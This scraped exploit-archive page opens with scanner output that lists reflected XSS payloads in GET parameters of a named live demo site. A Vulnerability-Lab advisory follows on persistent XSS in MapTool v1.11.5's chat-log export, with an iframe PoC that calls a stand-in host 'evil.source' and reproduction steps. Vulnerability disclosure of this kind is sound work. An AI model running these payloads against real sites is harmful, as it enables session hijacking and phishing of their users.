https://extensionsforjoomla.com/livedemo/vikappointments/en/our-staff?filters[country]=f1zzs%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3etpj3q&filters[distance]=5&filters[price]=25:300&start=5 GET parameter 'filters[service]' is vulnerable to XSS Path: /en/our-staff https://extensionsforjoomla.com/livedemo/vikappointments/en/our-staff?filters[group]=2&filters[service]=h9ool%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3euskap&filters[country]=236&filters[state]=2&filters[field_experience]=1&filters[distance]=5&filters[price]=50:180&ordering=4 GET parameter 'filters[distance]' is vulnerable to XSS Path: /en/our-staff https://extensionsforjoomla.com/livedemo/vikappointments/en/our-staff?filters[country]=236&filters[distance]=zi0c7%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3esw7i1&filters[price]=25:300&start=5 GET parameter 'filters[price]' is vulnerable to XSS Path: /en/our-staff https://extensionsforjoomla.com/livedemo/vikappointments/en/our-staff?filters[country]=236&filters[distance]=5&filters[price]=ofwz2%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3efixld&start=5 GET parameter 'filters[state]' is vulnerable to XSS Path: /en/our-staff https://extensionsforjoomla.com/livedemo/vikappointments/en/our-staff?filters[group]=2&filters[service]=1&filters[country]=236&filters[state]=j4qvq%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ev0uw9&filters[field_experience]=1&filters[distance]=5&filters[price]=50:180&ordering=4 GET parameter 'filters[field_experience]' is vulnerable to XSS Path: /en/our-staff https://extensionsforjoomla.com/livedemo/vikappointments/en/our-staff?filters[group]=2&filters[service]=1&filters[country]=236&filters[state]=2&filters[field_experience]=ib06r%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ebsg9b&filters[distance]=5&filters[price]=50:180&ordering=4 [-] Done </code></pre>

<pre><code>Document Title: =============== MapTool v1.11.5 - Cross Site Scripting Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2319 Release Date: ============= 2022-10-11 Vulnerability Laboratory ID (VL-ID): ==================================== 2319 Common Vulnerability Scoring System: ==================================== 5.6 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== MapTool is a fully featured, flexible virtual tabletop. Not only does MapTool come with powerful tools for creating detailed maps but also a chat function, an initiative tracker, and a detailed token management system to create characters, monsters, objects, and anything you can imagine. MapTool's user interface is highly configurable, and features not being used can be hidden out of sight. The latest version of MapTool can be found on GitHub. MapTool attempts to use Semantic Versioning to help groups know whether a change may break their game or not so they can decide when to upgrade. Exciting new features can be tested in development (alpha or beta) builds, but for your game where stability matters sticking to the major releases is recommended. MapTool campaigns saved in newer versions may not work on older versions, so be careful with your campaign files when trying out development builds. (Copy of the Homepage:https://wiki.rptools.info/index.php/MapTool ) (Download Software:https://www.rptools.net/toolbox/download-rptools-products ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent web vulnerability in the official MapTool v1.11.5 software. Affected Product(s): ==================== Rptools Product: MapTool v1.11.5 - (Windows) (Linux) (MacOS) Vulnerability Disclosure Timeline: ================================== 2022-06-03: Researcher Notification & Coordination (Security Researcher) 2022-06-04: Vendor Notification (Security Department) 2022-**-**: Vendor Response/Feedback (Security Department) 2022-**-**: Vendor Fix/Patch (Service Developer Team) 2022-**-**: Security Acknowledgements (Security Department) 2022-10-11: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Guest Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official MapTool v1.11.5 software. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The vulnerability is located in the Speicher den Nachrichtenverlauf (Save Message Logs) function that exports without a secure encode of html entities. Thus allows remote attackers to send malicious payloads that are not visible in the chat but being saved to the exported html file. Opening the html file directly executes the injected script code payloads on the local computer system. The vulnerability can be used by actors to form malicious files for malware, phishing or data exfiltration after locat compromise. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Vulnerable Module(s): [+] Chat Affected Module(s): [+] Speicher den Nachrichtenverlauf Proof of Concept (PoC): ======================= The persistent and non-persistent input validation web vulnerabilities can be exploited by remote attackers without user account and with or without low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. PoC: Payload <iframe src="http://evil.source/malicious.jsp?inject=<script>eval(name)</script>" name="alert(1337)"></iframe> Manual steps to reproduce the vulnerability: 1. Install the linux, windows or macos map software 2. Open the chat and inject payload 3. Send the input to execute 4. Save the chat logs by settings (default html) 5. Open the exported html file with the chat communication Note: Opening the file directly executes the payload 6. Successful reproduce of the non-persistent and persistent input validation vulnerability PoC: Exploitation (test.html) <table class="ava-msg"> <tbody><tr valign="top"> <td class="avatar"> </td> <td class="message"> Anonymer Benutzer: evil.source[MALICIOUS SCRIPT CODE EXECUTION POINT] </td> </tr> </tbody></table> </div> <div> "antlr.collections.AST.equalsTree(antlr.collections.AST)" because "this.tree" is null Fehler beim Ausführen des Ausdrucks . </div> <div> Fehlerspur: chat </div> <div> "antlr.collections.AST.equalsTree(antlr.collections.AST)" because "this.tree" is null Fehler beim Ausführen des Ausdrucks . </div> Security Risk: ============== The security risk of the persistent script code injection vulnerability in the maptool software is estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ;https://www.vulnerability-db.com Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE </code></pre>